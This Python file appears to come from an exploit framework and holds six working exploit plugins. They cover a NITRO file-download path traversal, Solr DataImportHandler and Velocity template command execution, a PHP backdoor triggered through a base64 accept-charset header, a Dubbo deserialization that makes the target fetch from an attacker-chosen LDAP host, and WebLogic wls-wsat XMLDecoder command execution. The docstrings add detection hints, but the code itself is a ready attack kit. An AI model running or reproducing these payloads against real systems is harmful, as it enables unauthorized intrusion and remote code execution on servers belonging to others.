def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Issue the plugin's ``/rapi/filedownload`` request and record the response.

    The request is a POST to ``<scheme>://<host>:<port>/rapi/filedownload`` with
    a ``filter=path:<Command>`` query string, ``X-NITRO-USER`` / ``X-NITRO-PASS``
    header values produced by ``randoms().result(8)``, a ``rand_key`` obtained
    through the ``get_rand`` helper and the fixed XML body
    ``<clipermission></clipermission>``. From a defender's side that combination
    of path, NITRO headers and body is the request shape to look for in access
    logs and WAF rules.

    Args:
        Url: target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: plugin options. ``Command`` (required) is the path placed
            after ``filter=path:`` with every ``/`` replaced by ``%2f``; the
            remaining options are forwarded to ``Exploit(...).Write``.

    Returns:
        None. The response text goes to ``ExploitOutput().Banner`` and
        ``Exploit(...).Write``; any exception raised inside the request phase
        is printed and handed to ``ErrorHandling`` / ``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is used unchanged
    # NOTE(review): a missing "Command" option makes kwargs.get() return None,
    # so .replace raises AttributeError here, outside the try/except below.
    command = kwargs.get("Command").replace("/", "%2f")
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        session = requests.Session()
        # create_session / get_rand are helpers defined elsewhere in the
        # project; the value get_rand yields is echoed back as 'rand_key'.
        create_session(session, payload_url, proxies, RandomAgent)
        value = get_rand(session, payload_url, proxies, RandomAgent)
        create_session(session, payload_url, proxies, RandomAgent)  # create the session again
        payload = command
        read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            'Content-Type': 'application/xml',
            'X-NITRO-USER': randoms().result(8),  # presumably an 8-character random value — helper not shown here
            'X-NITRO-PASS': randoms().result(8),
            'rand_key': value
        }
        data = '<clipermission></clipermission>'
        # verify=False: the target's TLS certificate is not validated.
        resp = session.post(url=read_file_payload, headers=headers, timeout=6, data=data, verify=False, proxies=proxies)
        con = resp.text
        ExploitOutput().Banner(OutputData=con)  # output function for the echoed response
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # pass in url and the scanned data
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        # NOTE(review): when 'algroup' is absent, _ is None and the string
        # concatenation passed to ErrorLog().Write raises TypeError inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url + " || Exploit", e)  # call the writer class with the URL and the failing plugin name
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Run the Solr DataImportHandler request chain against the target.

    Step 1 GETs ``/solr/admin/cores`` and reads core names from the ``status``
    object of the JSON reply (the last key listed is used). Step 2 POSTs a
    ``command=full-import`` form with ``debug=true`` and an inline
    ``dataConfig`` to ``/solr/<core>/dataimport``; the inline config carries
    ``Command`` inside a ``<script>`` transformer. For detection, a POST to a
    ``/dataimport`` handler whose body contains ``dataConfig=`` with a script
    transformer is the distinctive signal; accepting a request-supplied
    dataConfig is something a hardened Solr deployment can switch off.

    Args:
        Url: target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header on both requests.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: plugin options. ``Command`` (required) has spaces replaced by
            ``+`` before it is formatted into the dataConfig; the remaining
            options are forwarded to ``Exploit(...).Write``.

    Returns:
        None. The POST response text goes to ``VulnerabilityInfo`` and
        ``Exploit(...).Write``; exceptions inside the request phase are
        printed and handed to ``ErrorHandling`` / ``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is used unchanged
    # NOTE(review): a missing "Command" option makes kwargs.get() return None,
    # so .replace raises AttributeError here, outside the try/except below.
    command = kwargs.get("Command").replace(' ','+')  # handle spaces
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(port) + '/solr/admin/cores'
        # NOTE(review): this GET does not pass verify=False, unlike the POST
        # below, so an HTTPS target with an untrusted certificate fails here first.
        step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # the last core listed wins
            # NOTE(review): indentation below was restored from a collapsed
            # source; it is kept inside the 'status' branch because `name`
            # is only bound there. Nothing is sent when 'status' is absent.
            payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json"
            payload_url = scheme + "://" + url + ":" + str(port) + payload
            headers = {
                'User-Agent': RandomAgent,
                'Accept': 'application/json',
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest"
            }
            # URL-encoded dataConfig; the single {} placeholder receives `command`.
            data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=" + name + "&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(command)
            # verify=False: the target's TLS certificate is not validated.
            resp = requests.post(payload_url, data=data2, headers=headers, proxies=proxies, timeout=6, verify=False)
            ExploitOutput().Banner()  # output function, no echoed response
            _t = VulnerabilityInfo(resp.text)
            Exploit(_t.info, url, **kwargs).Write()  # pass in url and the scanned data
    except Exception as e:
        print("\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m")
        # NOTE(review): when 'algroup' is absent, _ is None and the string
        # concatenation passed to ErrorLog().Write raises TypeError inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +" || Exploit", e)  # call the writer class with the URL and the failing plugin name
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Send ``Command`` to ``/index.php`` as base64-encoded PHP in a request header.

    ``Command`` is wrapped as ``system("<Command>");``, base64-encoded and
    placed in a lower-case ``accept-charset`` header on a GET to ``/index.php``;
    the plugin assumes server-side code that decodes and evaluates that header
    (not shown on this page). For detection, an ``accept-charset`` header whose
    value is base64 text rather than a charset name is anomalous and worth
    alerting on at the proxy or WAF.

    Args:
        Url: target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: plugin options. ``Command`` is formatted into the PHP
            snippet as-is (a missing option is formatted as the text ``None``);
            the remaining options are forwarded to ``Exploit(...).Write``.

    Returns:
        None. The response text goes to ``VulnerabilityInfo`` and
        ``Exploit(...).Write``; exceptions inside the request phase are
        printed and handed to ``ErrorHandling`` / ``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is used unchanged
    command = kwargs.get("Command")
    try:
        payload = "/index.php"
        commandS = ('''system("{}");''').format(command)
        # cmd is bytes; it is passed unchanged as a header value below.
        cmd = base64.b64encode(commandS.encode('utf-8'))
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',  # looks like a redacted placeholder in the source — confirm intended value
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        # verify=False: the target's TLS certificate is not validated.
        resp = requests.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False)
        con = resp.text
        ExploitOutput().Banner()  # output function, no echoed response
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # pass in url and the scanned data
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        # NOTE(review): when 'algroup' is absent, _ is None and the string
        # concatenation passed to ErrorLog().Write raises TypeError inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url + " || Exploit", e)  # call the writer class with the URL and the failing plugin name
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Send a crafted Dubbo request whose argument references an LDAP URL.

    A ``DubboClient`` connects directly to ``host:port``; ``proxies`` is
    normalised but never used, and ``RandomAgent`` is unused too. The single
    argument is a ``com.rometools.rome.feed.impl.ToStringBean`` wrapping a
    ``com.sun.rowset.JdbcRowSetImpl`` whose ``dataSource`` is
    ``ldap://<ExploitUrl>``, sent as a ``$invoke`` call to ``DemoService``.
    The defender-side signal is an outbound LDAP connection from the Dubbo
    process to a caller-chosen host; blocking outbound JNDI/LDAP from
    application servers and keeping the server patched are the relevant
    controls.

    Args:
        Url: target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: accepted for interface compatibility; not used here.
        proxies: normalised by ``Proxies().result`` but not used here.
        **kwargs: plugin options. ``ExploitUrl`` (required) is the host part
            appended to ``ldap://``; a missing value makes the concatenation
            raise inside the try block. Remaining options go to
            ``Exploit(...).Write``.

    Returns:
        None. ``str(resp)`` goes to ``VulnerabilityInfo`` and
        ``Exploit(...).Write``; exceptions are printed and handed to
        ``ErrorHandling`` / ``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is used unchanged
    ExploitUrl = kwargs.get("ExploitUrl")
    try:
        # Direct connection to the Dubbo port; proxies/RandomAgent play no part.
        client = DubboClient(url, int(port))
        JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl', dataSource="ldap://" + ExploitUrl, strMatchColumns=["foo"])
        JdbcRowSetImplClass = new_object(
            'java.lang.Class',
            name="com.sun.rowset.JdbcRowSetImpl",
        )
        toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean', beanClass=JdbcRowSetImplClass, obj=JdbcRowSetImpl)
        resp = client.send_request_and_return_response(
            service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
            # author's note: the method name here may be $invoke, $invokeSync, $echo, etc.; the author claims it applies to 2.7.7 and every version listed in the CVE.
            method_name='$invoke',
            args=[toStringBean])
        ExploitOutput().Banner()  # output function, no echoed response
        _t = VulnerabilityInfo(str(resp))
        Exploit(_t.info, url, **kwargs).Write()  # pass in url and the scanned data
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        # NOTE(review): when 'algroup' is absent, _ is None and the string
        # concatenation passed to ErrorLog().Write raises TypeError inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url + " || Exploit", e)  # call the writer class with the URL and the failing plugin name
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """POST a ``java.beans.XMLDecoder`` SOAP document to ``/wls-wsat/CoordinatorPortType``.

    The SOAP header carries a ``work:WorkContext`` element holding an
    XMLDecoder-serialised ``java.lang.ProcessBuilder`` that runs ``Command``
    via ``/bin/bash -c`` (``OperatingSystem == "linux"``) or ``cmd.exe /c``
    (``"windows"``). Any other ``OperatingSystem`` value leaves ``data`` empty,
    and an empty-body POST is still sent. The path suggests a WebLogic WS-AT
    endpoint, though the page does not name the product. For detection,
    ``java.beans.XMLDecoder`` or ``java.lang.ProcessBuilder`` inside a
    ``WorkContext`` header on a ``/wls-wsat/`` request is the distinctive
    content.

    Args:
        Url: target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: plugin options. ``Command`` is formatted into the chosen
            XML template unchanged; ``OperatingSystem`` selects the template;
            the remaining options are forwarded to ``Exploit(...).Write``.

    Returns:
        None. The response text goes to ``VulnerabilityInfo`` and
        ``Exploit(...).Write``; exceptions inside the request phase are
        printed and handed to ``ErrorHandling`` / ``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is used unchanged
    command = kwargs.get("Command")
    # Both templates are triple-quoted literals; their whitespace is part of
    # the request body and is kept exactly as written.
    linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>{}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>'''.format(command)
    # NOTE(review): "\W" and "\S" in the cmd.exe path are not valid Python
    # escapes; the interpreter keeps them literally but emits a warning
    # (SyntaxWarning on 3.12+). A raw string would make the intent explicit.
    windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>C:\Windows\System32\cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>{}</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> '''.format(command)
    data = ""
    if kwargs.get("OperatingSystem") == "windows":
        data = windows_data
    elif kwargs.get("OperatingSystem") == "linux":
        data = linux_data
    # NOTE(review): no else branch — an unrecognised OperatingSystem sends an
    # empty body rather than failing early.
    try:
        payload = '/wls-wsat/CoordinatorPortType'
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "text/xml",
        }
        # verify=False: the target's TLS certificate is not validated.
        resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        ExploitOutput().Banner()  # output function, no echoed response
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # pass in url and the scanned data
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        # NOTE(review): when 'algroup' is absent, _ is None and the string
        # concatenation passed to ErrorLog().Write raises TypeError inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url + " || Exploit", e)  # call the writer class with the URL and the failing plugin name
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Run the Solr Velocity response-writer request chain against the target.

    Step 1 GETs ``/solr/admin/cores`` and takes a core name from the ``status``
    object of the JSON reply (the last key listed wins). Step 2 POSTs a JSON
    ``update-queryresponsewriter`` to ``/solr/<core>/config`` that registers
    ``solr.VelocityResponseWriter`` with ``params.resource.loader.enabled`` set
    to ``"true"``. Step 3 GETs ``/solr/<core>/select`` with ``wt=velocity`` and
    a ``v.template.custom`` parameter that embeds ``Command``; that response
    text is shown as output. For detection, a Config API POST that enables
    ``params.resource.loader.enabled`` followed by a select request carrying
    ``v.template.custom=`` are the two signals; restricting who may call the
    Config API removes the first step.

    Args:
        Url: target URL; split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header on every request.
        proxies: proxy specification, normalised by ``Proxies().result``.
        **kwargs: plugin options. ``Command`` (required) has spaces replaced by
            ``+`` before being formatted into the template parameter; the
            remaining options are forwarded to ``Exploit(...).Write``.

    Returns:
        None. The select response is passed to ``ExploitOutput().Banner`` and
        the config response to ``VulnerabilityInfo`` / ``Exploit(...).Write``;
        exceptions inside the request phase are printed and handed to
        ``ErrorHandling`` / ``ErrorLog``.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op branch: an explicit port is used unchanged
    # NOTE(review): a missing "Command" option makes kwargs.get() return None,
    # so .replace raises AttributeError here, outside the try/except below.
    command = kwargs.get("Command").replace(' ', '+')  # handle spaces
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(port) + '/solr/admin/cores'
        # NOTE(review): this GET does not pass verify=False, unlike the two
        # requests below, so an HTTPS target with an untrusted certificate fails here first.
        step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # the last core listed wins
            # NOTE(review): indentation below was restored from a collapsed
            # source; it is kept inside the 'status' branch because `name`
            # is only bound there. Nothing is sent when 'status' is absent.
            payload = "/solr/" + name + "/config"
            # Velocity template carried in the query string; the single {} receives `command`.
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(command)
            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            # Config API body; whitespace inside the literal is part of the request.
            payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            # verify=False on both: the target's TLS certificate is not validated.
            resp = requests.post(payload_url1, data=payload_data, headers=headers1, proxies=proxies, timeout=6, verify=False)
            resp2 = requests.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False)
            con2 = resp2.text
            # The original comment says "no echo", but the select response is
            # passed through as OutputData here.
            ExploitOutput().Banner(OutputData=con2)  # output function, no echoed response
            _t = VulnerabilityInfo(resp.text)
            Exploit(_t.info, url, **kwargs).Write()  # pass in url and the scanned data
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        # NOTE(review): when 'algroup' is absent, _ is None and the string
        # concatenation passed to ErrorLog().Write raises TypeError inside the handler.
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url + " || Exploit", e)  # call the writer class with the URL and the failing plugin name